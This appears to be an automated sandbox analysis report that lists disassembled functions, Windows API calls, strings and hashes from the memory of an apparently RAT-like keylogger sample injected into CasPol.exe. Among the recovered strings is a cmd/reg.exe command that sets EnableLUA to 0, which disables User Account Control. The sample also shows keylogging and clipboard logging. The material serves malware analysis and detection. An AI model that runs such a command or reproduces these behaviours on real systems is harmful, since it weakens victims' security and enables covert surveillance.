                                                                                                                        • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                        • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                        • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                        • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                        • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                      • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                      • API String ID: 2974294136-4018440003
                                                                                                                      • Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                                                                                                                      • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                      • Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                                                                                                                      • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                      • wsprintfW.USER32 ref: 0040A905
                                                                                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EventLocalTimewsprintf
                                                                                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                      • API String ID: 1497725170-248792730
                                                                                                                      • Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                                                                                                                      • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                      • Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                                                                                                                      • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                      • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                      • String ID: `AG
                                                                                                                      • API String ID: 1958988193-3058481221
                                                                                                                      • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                                                                      • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                      • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                                                                      • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                      APIs
                                                                                                                      • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                      • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                      • String ID: 0$MsgWindowClass
                                                                                                                      • API String ID: 2877667751-2410386613
                                                                                                                      • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                      • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                      • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                      • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                      APIs
                                                                                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                      Strings
                                                                                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                      • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle$CreateProcess
                                                                                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                      • API String ID: 2922976086-4183131282
                                                                                                                      • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                      • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                      • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                      • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                      • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                                      • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                      • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                      • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateValue
                                                                                                                      • String ID: pth_unenc$BG
                                                                                                                      • API String ID: 1818849710-2233081382
                                                                                                                      • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                                                                      • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                      • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                                                                      • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                      APIs
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                      • String ID: KeepAlive | Disabled
                                                                                                                      • API String ID: 2993684571-305739064
                                                                                                                      • Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                                                                                                                      • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                                      • Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                                                                                                                      • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                      Strings
                                                                                                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                      • API String ID: 3024135584-2418719853
                                                                                                                      • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                      • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                      • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                      • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: GetCursorInfo$User32.dll$`#v
                                                                                                                      • API String ID: 1646373207-1032071883
                                                                                                                      • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                      • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                      • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                      • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                                                      • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                                      • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                                                      • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                      • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3525466593-0
                                                                                                                      • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                                                      • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                      • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                                                      • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                        • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                        • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                        • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4269425633-0
                                                                                                                      • Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                                                                                                                      • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                      • Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                                                                                                                      • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                      • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                                      • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                      • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                                                                                                                      • __freea.LIBCMT ref: 0044FFD4
                                                                                                                        • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 313313983-0
                                                                                                                      • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                                      • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                      • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                                      • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                                      APIs
                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                                        • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                                      • _free.LIBCMT ref: 0044E1B0
                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 336800556-0
                                                                                                                      • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                                      • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                      • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                                      • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
                                                                                                                      • _free.LIBCMT ref: 00446F8D
                                                                                                                      • _free.LIBCMT ref: 00446FB4
                                                                                                                      • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
                                                                                                                      • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3170660625-0
                                                                                                                      • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                      • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                      • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                      • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 0044F7C5
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      • _free.LIBCMT ref: 0044F7D7
                                                                                                                      • _free.LIBCMT ref: 0044F7E9
                                                                                                                      • _free.LIBCMT ref: 0044F7FB
                                                                                                                      • _free.LIBCMT ref: 0044F80D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                      • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                      • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                      • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00443315
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      • _free.LIBCMT ref: 00443327
                                                                                                                      • _free.LIBCMT ref: 0044333A
                                                                                                                      • _free.LIBCMT ref: 0044334B
                                                                                                                      • _free.LIBCMT ref: 0044335C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
